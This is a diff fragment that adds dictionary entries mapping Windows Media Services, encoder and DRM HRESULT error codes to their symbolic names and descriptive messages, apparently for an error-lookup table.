+ 0xC00D13ED: ("NS_E_CACHE_ORIGIN_SERVER_NOT_FOUND", "The specified origin server cannot be found."),
+ 0xC00D13EE: ("NS_E_CACHE_ORIGIN_SERVER_TIMEOUT", "The specified origin server is not responding."),
+ 0xC00D13EF: ("NS_E_CACHE_NOT_BROADCAST", "The internal code for HTTP status code 412 Precondition Failed due to not broadcast type."),
+ 0xC00D13F0: ("NS_E_CACHE_CANNOT_BE_CACHED", "The internal code for HTTP status code 403 Forbidden due to not cacheable."),
+ 0xC00D13F1: ("NS_E_CACHE_NOT_MODIFIED", "The internal code for HTTP status code 304 Not Modified."),
+ 0xC00D1450: ("NS_E_CANNOT_REMOVE_PUBLISHING_POINT", "It is not possible to remove a cache or proxy publishing point."),
+ 0xC00D1451: ("NS_E_CANNOT_REMOVE_PLUGIN", "It is not possible to remove the last instance of a type of plug-in."),
+ 0xC00D1452: ("NS_E_WRONG_PUBLISHING_POINT_TYPE", "Cache and proxy publishing points do not support this property or method."),
+ 0xC00D1453: ("NS_E_UNSUPPORTED_LOAD_TYPE", "The plug-in does not support the specified load type."),
+ 0xC00D1454: ("NS_E_INVALID_PLUGIN_LOAD_TYPE_CONFIGURATION", "The plug-in does not support any load types. The plug-in must support at least one load type."),
+ 0xC00D1455: ("NS_E_INVALID_PUBLISHING_POINT_NAME", "The publishing point name is invalid."),
+ 0xC00D1456: ("NS_E_TOO_MANY_MULTICAST_SINKS", "Only one multicast data writer plug-in can be enabled for a publishing point."),
+ 0xC00D1457: ("NS_E_PUBLISHING_POINT_INVALID_REQUEST_WHILE_STARTED", "The requested operation cannot be completed while the publishing point is started."),
+ 0xC00D1458: ("NS_E_MULTICAST_PLUGIN_NOT_ENABLED", "A multicast data writer plug-in must be enabled in order for this operation to be completed."),
+ 0xC00D1459: ("NS_E_INVALID_OPERATING_SYSTEM_VERSION", "This feature requires Windows Server 2003, Enterprise Edition."),
+ 0xC00D145A: ("NS_E_PUBLISHING_POINT_REMOVED", "The requested operation cannot be completed because the specified publishing point has been removed."),
+ 0xC00D145B: ("NS_E_INVALID_PUSH_PUBLISHING_POINT_START_REQUEST", "Push publishing points are started when the encoder starts pushing the stream. This publishing point cannot be started by the server administrator."),
+ 0xC00D145C: ("NS_E_UNSUPPORTED_LANGUAGE", "The specified language is not supported."),
+ 0xC00D145D: ("NS_E_WRONG_OS_VERSION", "Windows Media Services will only run on Windows Server 2003, Standard Edition and Windows Server 2003, Enterprise Edition."),
+ 0xC00D145E: ("NS_E_PUBLISHING_POINT_STOPPED", "The operation cannot be completed because the publishing point has been stopped."),
+ 0xC00D14B4: ("NS_E_PLAYLIST_ENTRY_ALREADY_PLAYING", "The playlist entry is already playing."),
+ 0xC00D14B5: ("NS_E_EMPTY_PLAYLIST", "The playlist or directory you are requesting does not contain content."),
+ 0xC00D14B6: ("NS_E_PLAYLIST_PARSE_FAILURE", "The server was unable to parse the requested playlist file."),
+ 0xC00D14B7: ("NS_E_PLAYLIST_UNSUPPORTED_ENTRY", "The requested operation is not supported for this type of playlist entry."),
+ 0xC00D14B8: ("NS_E_PLAYLIST_ENTRY_NOT_IN_PLAYLIST", "Cannot jump to a playlist entry that is not inserted in the playlist."),
+ 0xC00D14B9: ("NS_E_PLAYLIST_ENTRY_SEEK", "Cannot seek to the desired playlist entry."),
+ 0xC00D14BA: ("NS_E_PLAYLIST_RECURSIVE_PLAYLISTS", "Cannot play recursive playlist."),
+ 0xC00D14BB: ("NS_E_PLAYLIST_TOO_MANY_NESTED_PLAYLISTS", "The number of nested playlists exceeded the limit the server can handle."),
+ 0xC00D14BC: ("NS_E_PLAYLIST_SHUTDOWN", "Cannot execute the requested operation because the playlist has been shut down by the Media Server."),
+ 0xC00D14BD: ("NS_E_PLAYLIST_END_RECEDING", "The playlist has ended while receding."),
+ 0xC00D1518: ("NS_E_DATAPATH_NO_SINK", "The data path does not have an associated data writer plug-in."),
+ 0xC00D151A: ("NS_E_INVALID_PUSH_TEMPLATE", "The specified push template is invalid."),
+ 0xC00D151B: ("NS_E_INVALID_PUSH_PUBLISHING_POINT", "The specified push publishing point is invalid."),
+ 0xC00D151C: ("NS_E_CRITICAL_ERROR", "The requested operation cannot be performed because the server or publishing point is in a critical error state."),
+ 0xC00D151D: ("NS_E_NO_NEW_CONNECTIONS", "The content cannot be played because the server is not currently accepting connections. Try connecting at a later time."),
+ 0xC00D151E: ("NS_E_WSX_INVALID_VERSION", "The version of this playlist is not supported by the server."),
+ 0xC00D151F: ("NS_E_HEADER_MISMATCH", "The command does not apply to the current media header user by a server component."),
+ 0xC00D1520: ("NS_E_PUSH_DUPLICATE_PUBLISHING_POINT_NAME", "The specified publishing point name is already in use."),
+ 0xC00D157C: ("NS_E_NO_SCRIPT_ENGINE", "There is no script engine available for this file."),
+ 0xC00D157D: ("NS_E_PLUGIN_ERROR_REPORTED", "The plug-in has reported an error. See the Troubleshooting tab or the NT Application Event Log for details."),
+ 0xC00D157E: ("NS_E_SOURCE_PLUGIN_NOT_FOUND", "No enabled data source plug-in is available to access the requested content."),
+ 0xC00D157F: ("NS_E_PLAYLIST_PLUGIN_NOT_FOUND", "No enabled playlist parser plug-in is available to access the requested content."),
+ 0xC00D1580: ("NS_E_DATA_SOURCE_ENUMERATION_NOT_SUPPORTED", "The data source plug-in does not support enumeration."),
+ 0xC00D1581: ("NS_E_MEDIA_PARSER_INVALID_FORMAT", "The server cannot stream the selected file because it is either damaged or corrupt. Select a different file."),
+ 0xC00D1582: ("NS_E_SCRIPT_DEBUGGER_NOT_INSTALLED", "The plug-in cannot be enabled because a compatible script debugger is not installed on this system. Install a script debugger, or disable the script debugger option on the general tab of the plug-in's properties page and try again."),
+ 0xC00D1583: ("NS_E_FEATURE_REQUIRES_ENTERPRISE_SERVER", "The plug-in cannot be loaded because it requires Windows Server 2003, Enterprise Edition."),
+ 0xC00D1584: ("NS_E_WIZARD_RUNNING", "Another wizard is currently running. Please close the other wizard or wait until it finishes before attempting to run this wizard again."),
+ 0xC00D1585: ("NS_E_INVALID_LOG_URL", "Invalid log URL. Multicast logging URL must look like \"http://servername/isapibackend.dll\"."),
+ 0xC00D1586: ("NS_E_INVALID_MTU_RANGE", "Invalid MTU specified. The valid range for maximum packet size is between 36 and 65507 bytes."),
+ 0xC00D1587: ("NS_E_INVALID_PLAY_STATISTICS", "Invalid play statistics for logging."),
+ 0xC00D1588: ("NS_E_LOG_NEED_TO_BE_SKIPPED", "The log needs to be skipped."),
+ 0xC00D1589: ("NS_E_HTTP_TEXT_DATACONTAINER_SIZE_LIMIT_EXCEEDED", "The size of the data exceeded the limit the WMS HTTP Download Data Source plugin can handle."),
+ 0xC00D158A: ("NS_E_PORT_IN_USE", "One usage of each socket address (protocol/network address/port) is permitted. Verify that other services or applications are not attempting to use the same port and then try to enable the plug-in again."),
+ 0xC00D158B: ("NS_E_PORT_IN_USE_HTTP", "One usage of each socket address (protocol/network address/port) is permitted. Verify that other services (such as IIS) or applications are not attempting to use the same port and then try to enable the plug-in again."),
+ 0xC00D158C: ("NS_E_HTTP_TEXT_DATACONTAINER_INVALID_SERVER_RESPONSE", "The WMS HTTP Download Data Source plugin was unable to receive the remote server's response."),
+ 0xC00D158D: ("NS_E_ARCHIVE_REACH_QUOTA", "The archive plug-in has reached its quota."),
+ 0xC00D158E: ("NS_E_ARCHIVE_ABORT_DUE_TO_BCAST", "The archive plug-in aborted because the source was from broadcast."),
+ 0xC00D158F: ("NS_E_ARCHIVE_GAP_DETECTED", "The archive plug-in detected an interrupt in the source."),
+ 0xC00D1590: ("NS_E_AUTHORIZATION_FILE_NOT_FOUND", "The system cannot find the file specified."),
+ 0xC00D1B58: ("NS_E_BAD_MARKIN", "The mark-in time should be greater than 0 and less than the mark-out time."),
+ 0xC00D1B59: ("NS_E_BAD_MARKOUT", "The mark-out time should be greater than the mark-in time and less than the file duration."),
+ 0xC00D1B5A: ("NS_E_NOMATCHING_MEDIASOURCE", "No matching media type is found in the source %1."),
+ 0xC00D1B5B: ("NS_E_UNSUPPORTED_SOURCETYPE", "The specified source type is not supported."),
+ 0xC00D1B5C: ("NS_E_TOO_MANY_AUDIO", "It is not possible to specify more than one audio input."),
+ 0xC00D1B5D: ("NS_E_TOO_MANY_VIDEO", "It is not possible to specify more than two video inputs."),
+ 0xC00D1B5E: ("NS_E_NOMATCHING_ELEMENT", "No matching element is found in the list."),
+ 0xC00D1B5F: ("NS_E_MISMATCHED_MEDIACONTENT", "The profile's media types must match the media types defined for the session."),
+ 0xC00D1B60: ("NS_E_CANNOT_DELETE_ACTIVE_SOURCEGROUP", "It is not possible to remove an active source while encoding."),
+ 0xC00D1B61: ("NS_E_AUDIODEVICE_BUSY", "It is not possible to open the specified audio capture device because it is currently in use."),
+ 0xC00D1B62: ("NS_E_AUDIODEVICE_UNEXPECTED", "It is not possible to open the specified audio capture device because an unexpected error has occurred."),
+ 0xC00D1B63: ("NS_E_AUDIODEVICE_BADFORMAT", "The audio capture device does not support the specified audio format."),
+ 0xC00D1B64: ("NS_E_VIDEODEVICE_BUSY", "It is not possible to open the specified video capture device because it is currently in use."),
+ 0xC00D1B65: ("NS_E_VIDEODEVICE_UNEXPECTED", "It is not possible to open the specified video capture device because an unexpected error has occurred."),
+ 0xC00D1B66: ("NS_E_INVALIDCALL_WHILE_ENCODER_RUNNING", "This operation is not allowed while encoding."),
+ 0xC00D1B67: ("NS_E_NO_PROFILE_IN_SOURCEGROUP", "No profile is set for the source."),
+ 0xC00D1B68: ("NS_E_VIDEODRIVER_UNSTABLE", "The video capture driver returned an unrecoverable error. It is now in an unstable state."),
+ 0xC00D1B69: ("NS_E_VIDCAPSTARTFAILED", "It was not possible to start the video device."),
+ 0xC00D1B6A: ("NS_E_VIDSOURCECOMPRESSION", "The video source does not support the requested output format or color depth."),
+ 0xC00D1B6B: ("NS_E_VIDSOURCESIZE", "The video source does not support the requested capture size."),
+ 0xC00D1B6C: ("NS_E_ICMQUERYFORMAT", "It was not possible to obtain output information from the video compressor."),
+ 0xC00D1B6D: ("NS_E_VIDCAPCREATEWINDOW", "It was not possible to create a video capture window."),
+ 0xC00D1B6E: ("NS_E_VIDCAPDRVINUSE", "There is already a stream active on this video device."),
+ 0xC00D1B6F: ("NS_E_NO_MEDIAFORMAT_IN_SOURCE", "No media format is set in source."),
+ 0xC00D1B70: ("NS_E_NO_VALID_OUTPUT_STREAM", "Cannot find a valid output stream from the source."),
+ 0xC00D1B71: ("NS_E_NO_VALID_SOURCE_PLUGIN", "It was not possible to find a valid source plug-in for the specified source."),
+ 0xC00D1B72: ("NS_E_NO_ACTIVE_SOURCEGROUP", "No source is currently active."),
+ 0xC00D1B73: ("NS_E_NO_SCRIPT_STREAM", "No script stream is set in the current source."),
+ 0xC00D1B74: ("NS_E_INVALIDCALL_WHILE_ARCHIVAL_RUNNING", "This operation is not allowed while archiving."),
+ 0xC00D1B75: ("NS_E_INVALIDPACKETSIZE", "The setting for the maximum packet size is not valid."),
+ 0xC00D1B76: ("NS_E_PLUGIN_CLSID_INVALID", "The plug-in CLSID specified is not valid."),
+ 0xC00D1B77: ("NS_E_UNSUPPORTED_ARCHIVETYPE", "This archive type is not supported."),
+ 0xC00D1B78: ("NS_E_UNSUPPORTED_ARCHIVEOPERATION", "This archive operation is not supported."),
+ 0xC00D1B79: ("NS_E_ARCHIVE_FILENAME_NOTSET", "The local archive file name was not set."),
+ 0xC00D1B7A: ("NS_E_SOURCEGROUP_NOTPREPARED", "The source is not yet prepared."),
+ 0xC00D1B7B: ("NS_E_PROFILE_MISMATCH", "Profiles on the sources do not match."),
+ 0xC00D1B7C: ("NS_E_INCORRECTCLIPSETTINGS", "The specified crop values are not valid."),
+ 0xC00D1B7D: ("NS_E_NOSTATSAVAILABLE", "No statistics are available at this time."),
+ 0xC00D1B7E: ("NS_E_NOTARCHIVING", "The encoder is not archiving."),
+ 0xC00D1B7F: ("NS_E_INVALIDCALL_WHILE_ENCODER_STOPPED", "This operation is only allowed during encoding."),
+ 0xC00D1B80: ("NS_E_NOSOURCEGROUPS", "This SourceGroupCollection doesn't contain any SourceGroups."),
+ 0xC00D1B81: ("NS_E_INVALIDINPUTFPS", "This source does not have a frame rate of 30 fps. Therefore, it is not possible to apply the inverse telecine filter to the source."),
+ 0xC00D1B82: ("NS_E_NO_DATAVIEW_SUPPORT", "It is not possible to display your source or output video in the Video panel."),
+ 0xC00D1B83: ("NS_E_CODEC_UNAVAILABLE", "One or more codecs required to open this content could not be found."),
+ 0xC00D1B84: ("NS_E_ARCHIVE_SAME_AS_INPUT", "The archive file has the same name as an input file. Change one of the names before continuing."),
+ 0xC00D1B85: ("NS_E_SOURCE_NOTSPECIFIED", "The source has not been set up completely."),
+ 0xC00D1B86: ("NS_E_NO_REALTIME_TIMECOMPRESSION", "It is not possible to apply time compression to a broadcast session."),
+ 0xC00D1B87: ("NS_E_UNSUPPORTED_ENCODER_DEVICE", "It is not possible to open this device."),
+ 0xC00D1B88: ("NS_E_UNEXPECTED_DISPLAY_SETTINGS", "It is not possible to start encoding because the display size or color has changed since the current session was defined. Restore the previous settings or create a new session."),
+ 0xC00D1B89: ("NS_E_NO_AUDIODATA", "No audio data has been received for several seconds. Check the audio source and restart the encoder."),
+ 0xC00D1B8A: ("NS_E_INPUTSOURCE_PROBLEM", "One or all of the specified sources are not working properly. Check that the sources are configured correctly."),
+ 0xC00D1B8B: ("NS_E_WME_VERSION_MISMATCH", "The supplied configuration file is not supported by this version of the encoder."),
+ 0xC00D1B8C: ("NS_E_NO_REALTIME_PREPROCESS", "It is not possible to use image preprocessing with live encoding."),
+ 0xC00D1B8D: ("NS_E_NO_REPEAT_PREPROCESS", "It is not possible to use two-pass encoding when the source is set to loop."),
+ 0xC00D1B8E: ("NS_E_CANNOT_PAUSE_LIVEBROADCAST", "It is not possible to pause encoding during a broadcast."),
+ 0xC00D1B8F: ("NS_E_DRM_PROFILE_NOT_SET", "A DRM profile has not been set for the current session."),
+ 0xC00D1B90: ("NS_E_DUPLICATE_DRMPROFILE", "The profile ID is already used by a DRM profile. Specify a different profile ID."),
+ 0xC00D1B91: ("NS_E_INVALID_DEVICE", "The setting of the selected device does not support control for playing back tapes."),
+ 0xC00D1B92: ("NS_E_SPEECHEDL_ON_NON_MIXEDMODE", "You must specify a mixed voice and audio mode in order to use an optimization definition file."),
+ 0xC00D1B93: ("NS_E_DRM_PASSWORD_TOO_LONG", "The specified password is too long. Type a password with fewer than 8 characters."),
+ 0xC00D1B94: ("NS_E_DEVCONTROL_FAILED_SEEK", "It is not possible to seek to the specified mark-in point."),
+ 0xC00D1B95: ("NS_E_INTERLACE_REQUIRE_SAMESIZE", "When you choose to maintain the interlacing in your video, the output video size must match the input video size."),
+ 0xC00D1B96: ("NS_E_TOO_MANY_DEVICECONTROL", "Only one device control plug-in can control a device."),
+ 0xC00D1B97: ("NS_E_NO_MULTIPASS_FOR_LIVEDEVICE", "You must also enable storing content to hard disk temporarily in order to use two-pass encoding with the input device."),
+ 0xC00D1B98: ("NS_E_MISSING_AUDIENCE", "An audience is missing from the output stream configuration."),
+ 0xC00D1B99: ("NS_E_AUDIENCE_CONTENTTYPE_MISMATCH", "All audiences in the output tree must have the same content type."),
+ 0xC00D1B9A: ("NS_E_MISSING_SOURCE_INDEX", "A source index is missing from the output stream configuration."),
+ 0xC00D1B9B: ("NS_E_NUM_LANGUAGE_MISMATCH", "The same source index in different audiences should have the same number of languages."),
+ 0xC00D1B9C: ("NS_E_LANGUAGE_MISMATCH", "The same source index in different audiences should have the same languages."),
+ 0xC00D1B9D: ("NS_E_VBRMODE_MISMATCH", "The same source index in different audiences should use the same VBR encoding mode."),
+ 0xC00D1B9E: ("NS_E_INVALID_INPUT_AUDIENCE_INDEX", "The bit rate index specified is not valid."),
+ 0xC00D1B9F: ("NS_E_INVALID_INPUT_LANGUAGE", "The specified language is not valid."),
+ 0xC00D1BA0: ("NS_E_INVALID_INPUT_STREAM", "The specified source type is not valid."),
+ 0xC00D1BA1: ("NS_E_EXPECT_MONO_WAV_INPUT", "The source must be a mono channel .wav file."),
+ 0xC00D1BA2: ("NS_E_INPUT_WAVFORMAT_MISMATCH", "All the source .wav files must have the same format."),
+ 0xC00D1BA3: ("NS_E_RECORDQ_DISK_FULL", "The hard disk being used for temporary storage of content has reached the minimum allowed disk space. Create more space on the hard disk and restart encoding."),
+ 0xC00D1BA4: ("NS_E_NO_PAL_INVERSE_TELECINE", "It is not possible to apply the inverse telecine feature to PAL content."),
+ 0xC00D1BA5: ("NS_E_ACTIVE_SG_DEVICE_DISCONNECTED", "A capture device in the current active source is no longer available."),
+ 0xC00D1BA6: ("NS_E_ACTIVE_SG_DEVICE_CONTROL_DISCONNECTED", "A device used in the current active source for device control is no longer available."),
+ 0xC00D1BA7: ("NS_E_NO_FRAMES_SUBMITTED_TO_ANALYZER", "No frames have been submitted to the analyzer for analysis."),
+ 0xC00D1BA8: ("NS_E_INPUT_DOESNOT_SUPPORT_SMPTE", "The source video does not support time codes."),
+ 0xC00D1BA9: ("NS_E_NO_SMPTE_WITH_MULTIPLE_SOURCEGROUPS", "It is not possible to generate a time code when there are multiple sources in a session."),
+ 0xC00D1BAA: ("NS_E_BAD_CONTENTEDL", "The voice codec optimization definition file cannot be found or is corrupted."),
+ 0xC00D1BAB: ("NS_E_INTERLACEMODE_MISMATCH", "The same source index in different audiences should have the same interlace mode."),
+ 0xC00D1BAC: ("NS_E_NONSQUAREPIXELMODE_MISMATCH", "The same source index in different audiences should have the same nonsquare pixel mode."),
+ 0xC00D1BAD: ("NS_E_SMPTEMODE_MISMATCH", "The same source index in different audiences should have the same time code mode."),
+ 0xC00D1BAE: ("NS_E_END_OF_TAPE", "Either the end of the tape has been reached or there is no tape. Check the device and tape."),
+ 0xC00D1BAF: ("NS_E_NO_MEDIA_IN_AUDIENCE", "No audio or video input has been specified."),
+ 0xC00D1BB0: ("NS_E_NO_AUDIENCES", "The profile must contain a bit rate."),
+ 0xC00D1BB1: ("NS_E_NO_AUDIO_COMPAT", "You must specify at least one audio stream to be compatible with Windows Media Player 7.1."),
+ 0xC00D1BB2: ("NS_E_INVALID_VBR_COMPAT", "Using a VBR encoding mode is not compatible with Windows Media Player 7.1."),
+ 0xC00D1BB3: ("NS_E_NO_PROFILE_NAME", "You must specify a profile name."),
+ 0xC00D1BB4: ("NS_E_INVALID_VBR_WITH_UNCOMP", "It is not possible to use a VBR encoding mode with uncompressed audio or video."),
+ 0xC00D1BB5: ("NS_E_MULTIPLE_VBR_AUDIENCES", "It is not possible to use MBR encoding with VBR encoding."),
+ 0xC00D1BB6: ("NS_E_UNCOMP_COMP_COMBINATION", "It is not possible to mix uncompressed and compressed content in a session."),
+ 0xC00D1BB7: ("NS_E_MULTIPLE_AUDIO_CODECS", "All audiences must use the same audio codec."),
+ 0xC00D1BB8: ("NS_E_MULTIPLE_AUDIO_FORMATS", "All audiences should use the same audio format to be compatible with Windows Media Player 7.1."),
+ 0xC00D1BB9: ("NS_E_AUDIO_BITRATE_STEPDOWN", "The audio bit rate for an audience with a higher total bit rate must be greater than one with a lower total bit rate."),
+ 0xC00D1BBA: ("NS_E_INVALID_AUDIO_PEAKRATE", "The audio peak bit rate setting is not valid."),
+ 0xC00D1BBB: ("NS_E_INVALID_AUDIO_PEAKRATE_2", "The audio peak bit rate setting must be greater than the audio bit rate setting."),
+ 0xC00D1BBC: ("NS_E_INVALID_AUDIO_BUFFERMAX", "The setting for the maximum buffer size for audio is not valid."),
+ 0xC00D1BBD: ("NS_E_MULTIPLE_VIDEO_CODECS", "All audiences must use the same video codec."),
+ 0xC00D1BBE: ("NS_E_MULTIPLE_VIDEO_SIZES", "All audiences should use the same video size to be compatible with Windows Media Player 7.1."),
+ 0xC00D1BBF: ("NS_E_INVALID_VIDEO_BITRATE", "The video bit rate setting is not valid."),
+ 0xC00D1BC0: ("NS_E_VIDEO_BITRATE_STEPDOWN", "The video bit rate for an audience with a higher total bit rate must be greater than one with a lower total bit rate."),
+ 0xC00D1BC1: ("NS_E_INVALID_VIDEO_PEAKRATE", "The video peak bit rate setting is not valid."),
+ 0xC00D1BC2: ("NS_E_INVALID_VIDEO_PEAKRATE_2", "The video peak bit rate setting must be greater than the video bit rate setting."),
+ 0xC00D1BC3: ("NS_E_INVALID_VIDEO_WIDTH", "The video width setting is not valid."),
+ 0xC00D1BC4: ("NS_E_INVALID_VIDEO_HEIGHT", "The video height setting is not valid."),
+ 0xC00D1BC5: ("NS_E_INVALID_VIDEO_FPS", "The video frame rate setting is not valid."),
+ 0xC00D1BC6: ("NS_E_INVALID_VIDEO_KEYFRAME", "The video key frame setting is not valid."),
+ 0xC00D1BC7: ("NS_E_INVALID_VIDEO_IQUALITY", "The video image quality setting is not valid."),
+ 0xC00D1BC8: ("NS_E_INVALID_VIDEO_CQUALITY", "The video codec quality setting is not valid."),
+ 0xC00D1BC9: ("NS_E_INVALID_VIDEO_BUFFER", "The video buffer setting is not valid."),
+ 0xC00D1BCA: ("NS_E_INVALID_VIDEO_BUFFERMAX", "The setting for the maximum buffer size for video is not valid."),
+ 0xC00D1BCB: ("NS_E_INVALID_VIDEO_BUFFERMAX_2", "The value of the video maximum buffer size setting must be greater than the video buffer size setting."),
+ 0xC00D1BCC: ("NS_E_INVALID_VIDEO_WIDTH_ALIGN", "The alignment of the video width is not valid."),
+ 0xC00D1BCD: ("NS_E_INVALID_VIDEO_HEIGHT_ALIGN", "The alignment of the video height is not valid."),
+ 0xC00D1BCE: ("NS_E_MULTIPLE_SCRIPT_BITRATES", "All bit rates must have the same script bit rate."),
+ 0xC00D1BCF: ("NS_E_INVALID_SCRIPT_BITRATE", "The script bit rate specified is not valid."),
+ 0xC00D1BD0: ("NS_E_MULTIPLE_FILE_BITRATES", "All bit rates must have the same file transfer bit rate."),
+ 0xC00D1BD1: ("NS_E_INVALID_FILE_BITRATE", "The file transfer bit rate is not valid."),
+ 0xC00D1BD2: ("NS_E_SAME_AS_INPUT_COMBINATION", "All audiences in a profile should either be same as input or have video width and height specified."),
+ 0xC00D1BD3: ("NS_E_SOURCE_CANNOT_LOOP", "This source type does not support looping."),
+ 0xC00D1BD4: ("NS_E_INVALID_FOLDDOWN_COEFFICIENTS", "The fold-down value needs to be between -144 and 0."),
+ 0xC00D1BD5: ("NS_E_DRMPROFILE_NOTFOUND", "The specified DRM profile does not exist in the system."),
+ 0xC00D1BD6: ("NS_E_INVALID_TIMECODE", "The specified time code is not valid."),
+ 0xC00D1BD7: ("NS_E_NO_AUDIO_TIMECOMPRESSION", "It is not possible to apply time compression to a video-only session."),
+ 0xC00D1BD8: ("NS_E_NO_TWOPASS_TIMECOMPRESSION", "It is not possible to apply time compression to a session that is using two-pass encoding."),
+ 0xC00D1BD9: ("NS_E_TIMECODE_REQUIRES_VIDEOSTREAM", "It is not possible to generate a time code for an audio-only session."),
+ 0xC00D1BDA: ("NS_E_NO_MBR_WITH_TIMECODE", "It is not possible to generate a time code when you are encoding content at multiple bit rates."),
+ 0xC00D1BDB: ("NS_E_INVALID_INTERLACEMODE", "The video codec selected does not support maintaining interlacing in video."),
+ 0xC00D1BDC: ("NS_E_INVALID_INTERLACE_COMPAT", "Maintaining interlacing in video is not compatible with Windows Media Player 7.1."),
+ 0xC00D1BDD: ("NS_E_INVALID_NONSQUAREPIXEL_COMPAT", "Allowing nonsquare pixel output is not compatible with Windows Media Player 7.1."),
+ 0xC00D1BDE: ("NS_E_INVALID_SOURCE_WITH_DEVICE_CONTROL", "Only capture devices can be used with device control."),
+ 0xC00D1BDF: ("NS_E_CANNOT_GENERATE_BROADCAST_INFO_FOR_QUALITYVBR", "It is not possible to generate the stream format file if you are using quality-based VBR encoding for the audio or video stream. Instead use the Windows Media file generated after encoding to create the announcement file."),
+ 0xC00D1BE0: ("NS_E_EXCEED_MAX_DRM_PROFILE_LIMIT", "It is not possible to create a DRM profile because the maximum number of profiles has been reached. You must delete some DRM profiles before creating new ones."),
+ 0xC00D1BE1: ("NS_E_DEVICECONTROL_UNSTABLE", "The device is in an unstable state. Check that the device is functioning properly and a tape is in place."),
+ 0xC00D1BE2: ("NS_E_INVALID_PIXEL_ASPECT_RATIO", "The pixel aspect ratio value must be between 1 and 255."),
+ 0xC00D1BE3: ("NS_E_AUDIENCE__LANGUAGE_CONTENTTYPE_MISMATCH", "All streams with different languages in the same audience must have same properties."),
+ 0xC00D1BE4: ("NS_E_INVALID_PROFILE_CONTENTTYPE", "The profile must contain at least one audio or video stream."),
+ 0xC00D1BE5: ("NS_E_TRANSFORM_PLUGIN_NOT_FOUND", "The transform plug-in could not be found."),
+ 0xC00D1BE6: ("NS_E_TRANSFORM_PLUGIN_INVALID", "The transform plug-in is not valid. It may be damaged or you may not have the required permissions to access the plug-in."),
+ 0xC00D1BE7: ("NS_E_EDL_REQUIRED_FOR_DEVICE_MULTIPASS", "To use two-pass encoding, you must enable device control and setup an edit decision list (EDL) that has at least one entry."),
+ 0xC00D1BE8: ("NS_E_INVALID_VIDEO_WIDTH_FOR_INTERLACED_ENCODING", "When you choose to maintain the interlacing in your video, the output video size must be a multiple of 4."),
+ 0xC00D1BE9: ("NS_E_MARKIN_UNSUPPORTED", "Markin/Markout is unsupported with this source type."),
+ 0xC00D2711: ("NS_E_DRM_INVALID_APPLICATION", "A problem has occurred in the Digital Rights Management component. Contact product support for this application."),
+ 0xC00D2712: ("NS_E_DRM_LICENSE_STORE_ERROR", "License storage is not working. Contact Microsoft product support."),
+ 0xC00D2713: ("NS_E_DRM_SECURE_STORE_ERROR", "Secure storage is not working. Contact Microsoft product support."),
+ 0xC00D2714: ("NS_E_DRM_LICENSE_STORE_SAVE_ERROR", "License acquisition did not work. Acquire a new license or contact the content provider for further assistance."),
+ 0xC00D2715: ("NS_E_DRM_SECURE_STORE_UNLOCK_ERROR", "A problem has occurred in the Digital Rights Management component. Contact Microsoft product support."),
+ 0xC00D2716: ("NS_E_DRM_INVALID_CONTENT", "The media file is corrupted. Contact the content provider to get a new file."),
+ 0xC00D2717: ("NS_E_DRM_UNABLE_TO_OPEN_LICENSE", "The license is corrupted. Acquire a new license."),
+ 0xC00D2718: ("NS_E_DRM_INVALID_LICENSE", "The license is corrupted or invalid. Acquire a new license"),
+ 0xC00D2719: ("NS_E_DRM_INVALID_MACHINE", "Licenses cannot be copied from one computer to another. Use License Management to transfer licenses, or get a new license for the media file."),
+ 0xC00D271B: ("NS_E_DRM_ENUM_LICENSE_FAILED", "License storage is not working. Contact Microsoft product support."),
+ 0xC00D271C: ("NS_E_DRM_INVALID_LICENSE_REQUEST", "The media file is corrupted. Contact the content provider to get a new file."),
+ 0xC00D271D: ("NS_E_DRM_UNABLE_TO_INITIALIZE", "A problem has occurred in the Digital Rights Management component. Contact Microsoft product support."),
+ 0xC00D271E: ("NS_E_DRM_UNABLE_TO_ACQUIRE_LICENSE", "The license could not be acquired. Try again later."),
+ 0xC00D271F: ("NS_E_DRM_INVALID_LICENSE_ACQUIRED", "License acquisition did not work. Acquire a new license or contact the content provider for further assistance."),
+ 0xC00D2720: ("NS_E_DRM_NO_RIGHTS", "The requested operation cannot be performed on this file."),
+ 0xC00D2721: ("NS_E_DRM_KEY_ERROR", "The requested action cannot be performed because a problem occurred with the Windows Media Digital Rights Management (DRM) components on your computer."),
+ 0xC00D2722: ("NS_E_DRM_ENCRYPT_ERROR", "A problem has occurred in the Digital Rights Management component. Contact Microsoft product support."),
+ 0xC00D2723: ("NS_E_DRM_DECRYPT_ERROR", "The media file is corrupted. Contact the content provider to get a new file."),
+ 0xC00D2725: ("NS_E_DRM_LICENSE_INVALID_XML", "The license is corrupted. Acquire a new license."),
+ 0xC00D2728: ("NS_E_DRM_NEEDS_INDIVIDUALIZATION", "A security upgrade is required to perform the operation on this media file."),
+ 0xC00D2729: ("NS_E_DRM_ALREADY_INDIVIDUALIZED", "You already have the latest security components. No upgrade is necessary at this time."),
+ 0xC00D272A: ("NS_E_DRM_ACTION_NOT_QUERIED", "The application cannot perform this action. Contact product support for this application."),
+ 0xC00D272B: ("NS_E_DRM_ACQUIRING_LICENSE", "You cannot begin a new license acquisition process until the current one has been completed."),
+ 0xC00D272C: ("NS_E_DRM_INDIVIDUALIZING", "You cannot begin a new security upgrade until the current one has been completed."),
+ 0xC00D272D: ("NS_E_BACKUP_RESTORE_FAILURE", "Failure in Backup-Restore."),
+ 0xC00D272E: ("NS_E_BACKUP_RESTORE_BAD_REQUEST_ID", "Bad Request ID in Backup-Restore."),
+ 0xC00D272F: ("NS_E_DRM_PARAMETERS_MISMATCHED", "A problem has occurred in the Digital Rights Management component. Contact Microsoft product support."),
+ 0xC00D2730: ("NS_E_DRM_UNABLE_TO_CREATE_LICENSE_OBJECT", "A license cannot be created for this media file. Reinstall the application."),
+ 0xC00D2731: ("NS_E_DRM_UNABLE_TO_CREATE_INDI_OBJECT", "A problem has occurred in the Digital Rights Management component. Contact Microsoft product support."),
+ 0xC00D2732: ("NS_E_DRM_UNABLE_TO_CREATE_ENCRYPT_OBJECT", "A problem has occurred in the Digital Rights Management component. Contact Microsoft product support."),
+ 0xC00D2733: ("NS_E_DRM_UNABLE_TO_CREATE_DECRYPT_OBJECT", "A problem has occurred in the Digital Rights Management component. Contact Microsoft product support."),
+ 0xC00D2734: ("NS_E_DRM_UNABLE_TO_CREATE_PROPERTIES_OBJECT", "A problem has occurred in the Digital Rights Management component. Contact Microsoft product support."),
+ 0xC00D2735: ("NS_E_DRM_UNABLE_TO_CREATE_BACKUP_OBJECT", "A problem has occurred in the Digital Rights Management component. Contact Microsoft product support."),
+ 0xC00D2736: ("NS_E_DRM_INDIVIDUALIZE_ERROR", "The security upgrade failed. Try again later."),
